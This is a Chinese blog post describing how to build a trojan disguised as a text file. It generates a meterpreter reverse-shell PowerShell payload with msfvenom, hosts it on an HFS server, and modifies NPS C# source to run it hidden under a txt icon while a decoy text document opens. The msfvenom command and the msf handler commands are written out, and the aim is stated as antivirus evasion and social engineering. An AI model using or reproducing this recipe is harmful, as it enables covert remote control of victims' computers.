美文网首页
伪造txt文本免杀

伪造txt文本免杀

作者: F1_bd2c | 来源:发表于2019-12-19 11:26 被阅读0次

    Nps 执行 powershell 绕过杀软

    概述

    https://www.jianshu.com/p/2041b89ff572

    https://zhuanlan.zhihu.com/p/81344955

    可以先参考下小白之前的文章

    本次思路大致是这样的:

    使用msf生成powershell脚本,并将其放在web服务器上。通过nps 执行 powershell命令(例如:IEX。。。。。。。。)当然已有大佬将源码公https://github.com/Ben0xA/nps。小白这次还是对其源码修改,加入社工的元素。

    Frp公网映射

    https://www.jianshu.com/p/2041b89ff572

    可以参考小白的这篇文章。

    Msfveom生成powershell

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f psh-reflection >lly_360_4.ps1

    生成的powershell大致是这样的

    搭建简易hfs服务器

    网上拥有很多搭建方式,当然你也可以使用tomcat,nignx等等。本次试验我用的的hfs,将ps1脚本上传hfs上。

    C#修改nps源码

    替换一个txt图标。

    无黑框运行

    写一个创建txt文档的函数。

    在木马运行当前路径的上一层,打开一个txt,这样不易被发现。实现的功能是用户双击exe后,弹出一个txt文档。

    Msf监听

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 127.0.0.1

    set lport 4444

    小白之前的思路是这样的:目标双击exe,在当前目录下打开一个txt文档,将进程移入其他方,并删除exe自身文件。

    但是无奈于能力有限,不会做,那就只能在当前目录的上一层创建并打开txt文档。(希望大佬可以给小白一些建议)。

    当然只有洁身自好,才是更好的防护方法。下面这个文章好像让我明白了些什么,哈哈哈。(希望我的能让大家提供安全意识)https://www.zhihu.com/question/322029091/answer/672283363?utm_source=wechat_session&utm_medium=social&utm_oi=949385938997166080&hb_wx_block=1

                        YLL

    2019-9-20

    相关文章

      网友评论

          本文标题:伪造txt文本免杀

          本文链接:https://www.haomeiwen.com/subject/iprmnctx.html